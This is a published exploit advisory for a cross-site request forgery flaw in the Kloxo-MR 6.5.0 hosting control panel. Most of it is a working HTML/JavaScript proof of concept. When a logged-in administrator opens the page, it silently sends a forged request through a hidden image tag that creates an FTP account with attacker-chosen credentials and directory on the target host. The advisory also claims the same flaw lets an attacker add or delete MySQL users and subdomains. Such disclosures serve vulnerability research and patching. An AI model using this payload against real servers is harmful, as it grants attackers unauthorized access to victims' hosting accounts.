# Exploit Title :Kloxo-MR 6.5.0 CSRF Vulnerability # Vendor Homepage :https://github.com/mustafaramadhan/kloxo/tree/dev # Version :Kloxo-MR 6.5.0.f-2014020301 # Tested on :Centos 6.4 # Exploit Author :Necmettin COSKUN =>@babayarisi # Blog :http://www.ncoskun.com http://www.grisapka.org # Discovery date :03/12/2014 # CVE :N/A Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+). This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan'). ================ CSRF Vulnerability Vulnerability ================ Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts. Poc Exploit ================ <html> <head><title>Kloxo-MR demo</title></head> <script type="text/javascript"> function yurudi(){ /////////////////////////////////////////////////////////// //Kloxo-MR 6.5.0 CSRF Vulnerability // //Author:Necmettin COSKUN => twitter.com/@babayarisi // //Blog: http://www.ncoskun.com | http://www.grisapka.org // /////////////////////////////////////////////////////////// //Remote host var host="victim.com"; //New Ftp Username var username="demouser"; //New Ftp Password var pass="12345678"; //This creates new folder under admin dir. /admin/yourfolder var dir="demodirectory"; //If necessary only modify http to https ;) var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add"; document.getElementById('demoexploit').src=urlson; } </script> <body onload="yurudi();"> <img id="demoexploit" src=""></img> </body> </html> Discovered by: ================ Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!